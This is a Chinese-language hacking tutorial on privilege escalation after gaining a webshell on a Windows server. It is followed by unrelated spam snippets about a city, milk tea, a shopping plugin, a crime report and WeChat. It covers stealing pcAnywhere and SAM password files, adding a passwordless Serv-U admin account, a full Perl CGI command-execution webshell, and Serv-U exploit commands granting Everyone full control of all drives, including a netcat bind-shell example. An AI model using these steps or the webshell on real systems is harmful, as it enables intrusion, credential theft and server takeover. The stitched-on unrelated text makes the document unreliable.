当我们取得一个webshell时候,下一部要做的就是提升权限
个人总结如下:
1: C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere 看能否跳转到这个目录,如果行那就更好了,直接下它的CIF文件,得到pcAnywhere密码,登陆
2.C:\WINNT\system32\config进这里下它的SAM,破解用户的密码
用到破解sam密码的软件有LC,SAMinside
3.C:\Documents and Settings\All Users\「开始」菜单\程序 看这里能跳转不,我们从这里可以获取好多有用的信息
可以看见好多快捷方式,我们一般选择Serv-U的,然后本地查看属性,知道路径后,看能否跳转
进去后,如果有权限修改ServUDaemon.ini,加个用户上去,密码为空
[USER=WekweN|1]
Password=
HomeDir=c:TimeOut=600
Maintenance=System
Access1=C:\|RWAMELCDP
Access1=d:\|RWAMELCDP
Access1=f:\|RWAMELCDP
SKEYValues=
这个用户具有更高权限,然后我们就可以ftp上去 quote site exec xxx 来提升权限
4.c:\winnt\system32\inetsrv\data就是这个目录,同样是erveryone 完全控制,我们所要做的就是把提升权限的工具上传上去,然后执行
5.看能否跳转到如下目录
c:\php, 用phpspy
c:\prel,有时候不一定是这个目录(同样可以通过下载快捷方式看属性获知)用cgi的webshell
#!/usr/bin/perl
binmode(STDOUT);
syswrite(STDOUT, "Content-type: text/html\r\n\r\n", 27);
$_ = $ENV{QUERY_STRING};
s/%20/ /ig;
s/%2f/\//ig;
$execthis = $_;
syswrite(STDOUT, "<HTML><PRE>\r\n", 13);
open(STDERR, ">&STDOUT") || die "Can't redirect STDERR";
system($execthis);
syswrite(STDOUT, "\r\n</PRE></HTML>\r\n", 17);
close(STDERR);
close(STDOUT);
exit;
保存为cgi执行,
如果不行,可以试试 pl 扩展呢,把刚才的 cgi 文件改为 pl 文件,提交 http://anyhost//cmd.pl?dir
显示"拒绝访问",表示可以执行了!马上提交:先的上传个su.exe(ser-u提升权限的工具)到 prel的bin目录
http://anyhost//cmd.pl?c\perl\bin\su.exe
返回:
Serv-u >3.x Local Exploit by xiaolu
USAGE: serv-u.exe "command"
Example: serv-u.exe "nc.exe -l -p 99 -e cmd.exe"
现在是 IUSR 权限,提交:
http://anyhost//cmd.pl?c\perl\bin\su.exe "cacls.exe c: /E /T /G everyone:F"
http://anyhost//cmd.pl?c\perl\bin\su.exe "cacls.exe d: /E /T /G everyone:F"
http://anyhost//cmd.pl?c\perl\bin\su.exe "cacls.exe e: /E /T /G everyone:F"
http://anyhost//cmd.pl?c\perl\bin\su.exe "cacls.exe f: /E /T /G everyone:F"
台州隶属浙江,是第二批国家新型城镇化综合试点地区,截至2017年底,台州市有中国名牌产品19个,浙江名牌产品286个,地理标志保护产品3个,被评为2018中国大陆最佳地级城市30强。那么在这里注册...
做奶茶的方法(教你在家做锅煮奶茶)我很少买奶茶喝,想喝了从来都是自己动手煮。各种口味的奶茶,几乎都有涉猎。尤其是在冬日里,听着音乐,在饭香氤氲的厨房里,悠闲地给自己煮上一小壶奶茶,热汽腾腾,奶香中还飘...
我们之前先容过的一件海淘工具:比网易惠惠更好用的一键海淘插件,零米海淘 安装插件后,美亚/日亚等网站的商品加入购物车,结账即可,十分利便。 现对我站网友指定的优惠:商品拍下后联系客服,说奥利给的记...
⒈我想问一下网站被黑客攻击要几日恢复好.这一需看是什么种类的攻击了,如果是总流量攻击得话,要是抗住攻击总流量,网站就可以一切正常了。如果是网站网站被黑得话,必须开展网站被黑解决,这一就较为不便,可是假...
10月31日,广东省广州市公安局天河区分局官方转达称:10月31日10时许,天河区岗顶四周有一名男子持刀伤人,随后跳楼自杀。接报警后,天河警方迅速派员加入处置。经开端观察,犯罪嫌疑人赵某(35岁,...
1、微信最多能加多少好友 相信对这一点很多人都不知道,因为微信不像QQ,好友列表里的人都是自己认识的亲戚朋友。那么微信最多可以添加多少好友呢?其实微信最多可以添加5000个好友,但不包括社群、公共号。...